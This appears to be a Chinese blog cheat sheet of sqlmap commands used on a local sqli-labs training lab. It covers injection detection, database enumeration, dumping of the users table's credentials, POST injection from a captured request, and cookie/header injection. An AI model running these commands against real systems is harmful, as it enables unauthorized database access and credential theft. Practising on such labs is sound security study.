sqlmap一些常用命令

仅供交流学习使用,请勿用于非法用途

python 复制代码
1)检测url存在漏洞情况:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1"
2)获取所有数据库名称:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --dbs
3)获取指定库的所有表名:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --tables -D security
4)获取当前数据库名是什么:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --current-db
5)获取指定库指定表的所有字段:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --columns -D security -T users
6)!!!禁止使用!!!拖库:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" -C id,password,username  -D security -T users --dump

以上为本地测试,请勿用于非法用途

环境,phpstudy搭建的sqli-labs

补充:

python 复制代码
7)多参数时指定参数:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1&page=1" -p page
	或者:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1&page=1" -p page --batch
	其中 --batch 是自动化测试,需要选择,全部默认Y(注入过程可能比较久)
8)批量检测:python sqlmap.py -m C:\Users\Administrator\Desktop\url.txt
9)设置cookie(检测需要登录的url):python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --cookie "cookie内容" --dbs
10)随机使用一个User-agent头部,或者指定一个User-agent头部: 随机: --random-agent
	指定:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --user-agent="User-agent头部" --dbs

以上是get方式

以下是post方式

补充:

python 复制代码
post注入(其他内容获取都一样):python sqlmap.py -r C:\Users\Administrator\Desktop\2.txt -p uname --dbs

2.txt文件内容:

xml 复制代码
POST /sqli-labs-master/Less-11/ HTTP/1.1
Host: 192.168.88.128
User-Agent: 等等等
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://192.168.88.128
Connection: close
Referer: http://192.168.88.128/sqli-labs-master/Less-11/
Upgrade-Insecure-Requests: 1

uname=aaa&passwd=bbb&submit=Submit

此文件是burpsuite拦截的,至于怎么保存这个文件自己查询或者直接复制都是可以的

补充:

head头注入:可以是cookie或者User-Agent

python 复制代码
head头注入:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-20/" --cookie "uname=Dumb" --level 2 --dbs

--level:指定测试等级

相关推荐
mooyuan天天19 天前
sqli-labs通关笔记-第20关 字符型Header-Cookie SQL注入(单引号闭合 手工注入+脚本注入两种方法)
web安全·sql注入·sqlmap·sql注入漏洞·header注入·sqli-labs靶场
mooyuan天天19 天前
sqli-labs通关笔记-第23关 GET字符型注入(单引号闭合-过滤注释符 手工注入+脚本注入两种方法)
sql注入·sqlmap·sql注入漏洞·sqli-labs靶场
看天走路吃雪糕20 天前
墨者:SQL注入实战-MySQL
数据库·mysql·base64·sql注入·sqlmap·墨者靶场·tamper
看天走路吃雪糕20 天前
墨者:SQL手工注入漏洞测试(MySQL数据库-字符型)
数据库·mysql·sql注入·sqlmap·墨者学院·字符型注入
看天走路吃雪糕20 天前
墨者:SQL注入漏洞测试(布尔盲注)
数据库·sql·sqlmap·墨者学院·布尔盲注
mooyuan天天3 个月前
Webug4.0通关笔记12- 第17关 文件上传之前端拦截(3种方法)
web安全·文件上传·文件上传漏洞·web渗透·webug4靶场·文件上传前端绕过
测试小罡5 个月前
SqlmapAPI:自动化SQL注入的利器
sqlmap
shenghuiping20017 个月前
SQLmap 自动注入 -02
mysql·web·sql注入·sqlmap
殇ベ言清欢8 个月前
sqlmap详细使用
安全·web安全·sqlmap
Smile灬凉城6669 个月前
CTF之WEB(sqlmap tamper 参数)
python·安全·sqlmap